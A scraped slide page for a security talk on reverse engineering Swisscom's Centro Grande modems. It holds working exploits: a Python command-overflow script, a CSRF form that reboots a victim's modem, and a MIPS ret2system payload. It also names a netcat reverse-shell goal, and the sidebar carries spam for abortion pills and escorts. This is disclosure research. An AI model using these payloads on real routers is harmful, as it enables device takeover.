Debugging Ruby SystemsEngine Yard
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Praguetomasbart
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornmentAsif
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptxssuserb4d806
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NamePositive Hack Days
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяEkaterina Melnik
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightLinaro
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFBrendan Gregg
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick StackGianluca Arbezzano
 

Ähnlich wie Reverse engineering Swisscom's Centro Grande Modem (20)

Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPF
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Prague
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornment
 
C&C Botnet Factory
C&C Botnet FactoryC&C Botnet Factory
C&C Botnet Factory
 
Osol Pgsql
Osol PgsqlOsol Pgsql
Osol Pgsql
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 

Mehr von Cyber Security Alliance

Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Cyber Security Alliance
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksCyber Security Alliance
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 

Mehr von Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 
Colt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinalColt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinal
 

Kürzlich hochgeladen

Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionOnePlan Solutions
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfVishalKumarJha10
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is insideshinachiaurasa2
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxalwaysnagaraju26
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...Shane Coughlan
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Nitya salvi
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 

Kürzlich hochgeladen (20)

Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 

Reverse engineering Swisscom's Centro Grande Modem

  • 1. Reverse engineering Swisscom’sReverse engineering Swisscom’s Centro Grande modemsCentro Grande modems Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert
  • 2. 2whoami › Alain Mowat (@plopz0r) › Head of Audit division at SCRT › Pentest › Code review › Trainings › Mostly a Web App guy › Member of 0daysober CTF team › Watch other people exploiting cool vulns
  • 3. 3Background › Why look into the Swisscom modems? › Why this talk? › I don’t actually own a Swisscom modem › Made it a bit harder to study...
  • 4. 4Attack Surface › ADB# show netstat tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:9090 0.0.0.0:* udp 0 0 127.0.0.1:15000 0.0.0.0:* udp 0 0 0.0.0.0:53 0.0.0.0:* udp 0 0 0.0.0.0:323 0.0.0.0:* udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* udp 0 0 178.199.180.148:5060 0.0.0.0:* udp 0 0 192.168.1.1:5351 0.0.0.0:* udp 0 0 0.0.0.0:1900 0.0.0.0:* udp 0 0 192.168.1.1:47863 0.0.0.0:* udp 0 0 0.0.0.0:123 0.0.0.0:* udp 0 0 ff02::1:2:547 :::* udp 0 0 :::53 :::* udp 0 0 :::323 :::* udp 0 0 :::123 :::* raw 0 0 0.0.0.0:2 0.0.0.0:* 2 raw 0 0 0.0.0.0:6 0.0.0.0:* 6 raw 0 0 :::58 :::*
  • 5. 5Attack Surface › ADB# show processes 256 0 2040 S logd 259 0 1308 S klogd -c3 271 0 832 S ec 343 0 3236 S cm 350 0 0 SW [dsl0] 363 0 0 SW [bcmsw] 364 0 0 SW [bcmsw_timer] 365 0 0 SW< [linkwatch] 5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168 6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300 6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf 7362 0 1000 S dhcps /tmp/dhcps.conf 7910 0 764 S dns 8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4 8026 0 736 S /bin/wpspbc 8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf 9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot 9177 0 2940 S cwmp 9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh 9353 0 884 S ec 9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300 11846 0 1332 S /bin/sh DHCPv4Client.sh 11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C 14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p 15287 0 3576 S voip 15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro 15923 0 1056 S N chronyd -f /tmp/chrony.conf 16770 0 820 S radvd 16812 0 2036 S dibbler-server start
  • 6. 6Finding the firmware › Locate the firmware › https://www.swisscom.ch/en/residential/help/device/internet-router/centro- grande.html › Vx226x1_61400.sig › Version at the time › 6.14.00
  • 7. 7Extracting the firmware › Binwalk (https://github.com/devttys0/binwalk) › Firmware modification kit › ./extract-firmware.sh
  • 8. 8CPE WAN Management Protocol › Also known as TR-069 › Protocol that defines how to manage « Customer-premises Equipment » › cwmp binary › Listens to 0.0.0.0:7547 › iptables rule allows access only from certain Swisscom subnets
  • 9. 9Web interface › Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html) › If a binary file is accessed through the web interface, it executes it › Directory traversal → Code Exec in version 1.9.3
  • 10. 10Web interface › Mostly managed by a CGI called ui
  • 11. 11Emulating the device › OpenWRT (https://openwrt.org/) › Linux distribution for embedded devices › Qemu (http://wiki.qemu.org/Main_Page) › Machine emulator and virtualizer
  • 12. 12Configuring OpenWRT › make menuconfig › MIPS target › Add all debugging and networking tools › Cross-compile nhttpd › Generate ramdisk › Copy Swisscom firmware files to the image › Run image with qemu › qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini- tramfs.elf -net tap -net nic -nographic -m 2048
  • 13. 13Setting up the image › nhttpd server serverroot /www serveradmin webmaster@adbglobal.com servermimes conf/mimes docroot /www/htdocs docindex lanhosts logpid /tmp/logs user nobody disablehttp 0 notfound 501 sslport 443 sslcert /etc/certs/server.crt sslcertkey /etc/certs/server.key sslcertca /etc/certs/ca.pem sslcertreq * serverlisten 0.0.0.0 servername localhost
  • 16. 16Web request overview nhttpd swc_login.yapl swc_common.yapl swc_firewall.yapl ... ui cm POST /ui/swc/login Environment setup Configuration command Get corresponding YAPL « script »
  • 17. 17Configuration manager › Used to view and modify the device’s configuration › Bound to localhost:9034 › Also /tmp/cmctl socket › Several possible commands › GETO, GETV, … › SET, SETM, … › RESET, REBOOT, ... › DUMP, EXPORT, ...
  • 19. 19Configuration manager › Main loop listen on localhost port 9034 socket = accept while 1: input = socket.recv(16384) handleRequest(input) def handleRequest(input): type = validateRequestType(input) params = validateRequestParams(input) callTypeHandler(params)
  • 21. 21Finalizing the image setup udhcpc -i br-lan cm touch /tmp/cmctl chmod 777 /tmp/cmctl nhttpd -c /www/nhttpd.cfg nc localhost 9034 DOM Device /etc/cm/tr181/dom/ DOM InternetGatewayDevice /etc/cm/tr098/dom/ CONF /etc/cm/conf/ ADD InternetGatewayDevice.WANDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1 SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1 SET Device.IP.Interface.1.Status Up SET Device.Ethernet.Link.1.Name br-lan SET Device.DeviceInfo.SerialNumber 123456 SET Device.IP.Interface.1.X_ADB_Upstream true SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
  • 23. 23Configuration manager › Special syntax › Similar to SQL in certain ways › SELECT =~ GETV › UPDATE =~ SET › Conditions › GETO A.B.C.[Test=1] › GETO A.B.C.[Test~1] › GETO A.B.C.[Test!1]
  • 24. 24Vulnerability #1 : Command overflow › Each call to recv is treated as a new command › By sending more than 16384 characters, we can craft a new configuration command › Logging in to the web interface generates a call to the configuration manager that looks like this › GETO Users.User.[Username=ATTACKER_CONTROLLED] › By providing a long username, we can exceed the 16348 limit and gene- rate a new request within the configuration manager › Allows complete control over the device › Change passwords › Allow remote access › ...
  • 25. 25Vulnerability #1 : Command overflow ui cm GETO Users.User.[Username=A AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA […] AAAAAAAAAAAAAAAAAAAAAAAAAAA REBOOTn recv(16384) recv(16384) send process(‘GETO Users……’) process(‘REBOOT’)
  • 26. 26Exploit #1 : Command overflow from requests import post payload = dict() payload['userName'] = ( 16358 ) * 'a' + 'REBOOT' + 'n' payload['userPwd'] = 'a' payload['login'] = 'Login' payload['language'] = '' while 1: r = post('http://192.168.1.1/ui/swc/login/index', data=payload) D EM O
  • 27. 27Vulnerability #2 : Login CSRF › Use CSRF to exploit someone else’s device <html> <body> <form method="POST" action="http://192.168.1.1/ui/swc/login/index"> <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/> <input type="hidden" name="userPwd" value="a"/> <input type="hidden" name="login" value="login"/> <input type="hidden" name="language" value=""/> </form> <script> document.forms[0].submit(); </script> </body> </html>
  • 28. 28Exposed web interfaces – Centro Business
  • 29. 29Vulnerability #3 : Buffer overflow(s) › Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …) › Requirements › Arbitrarily-named XML file on the device › file and folder are both limited to 4096 in size parseFilesinFolder(folder): char path[4096]; files = scandir(folder) for file in files: if file ends with ".xml": strncat(path,folder,4096) strncat(path,file,4096) parseFile(filename)
  • 30. 30Exploit #3 : Creating the XML file › The PATHSAVE command takes 2 arguments › An XML filename › Property that needs to be saved › PATHSAVE /tmp/test.xml Users.User.1.Password › Can use this to write an arbitrarily-named file on the device › Exploit can then be triggered by prepending folder with lots of / › CONF /////////////////////////////////////[…]/tmp/exploit.xml
  • 31. 31Exploit #3 : Exploiting a MIPS binary Prologue Epilogue
  • 32. 32Exploit #3 : Exploiting a MIPS binary › No ASLR on the device › No NX › No canaries › A version of nc with the -e switch is present on the device › Try to call system(‘nc attacker 4444 -e sh’) › Arguments are not passed on the stack though, but in registers › $a0 › $a1 › …
  • 33. 33Exploit #3 : ret2system › Quick analysis gives address of system in libUclibc (Centro business) : › Libuclibc base : 0x2aaf8000 › System is at offset : 0x54610 › Real address : 0x2ab4c610 › Need a gadget in order to get our argument to system in $a0 › Make $a0 point to address in the stack › $s0 is also under our control
  • 34. 34Exploit #3 : ret2system /tmp/aaaaaaaaaaaaaaaax2axb4xc6x10bbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbx2axb1xcaxacaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot; #bbbb.xml $ra → gadget $s0 → system command 64 * ‘a’ (addiu $a0,$sp,64)
  • 35. 35Exploit #3 : Full exploit D EM O
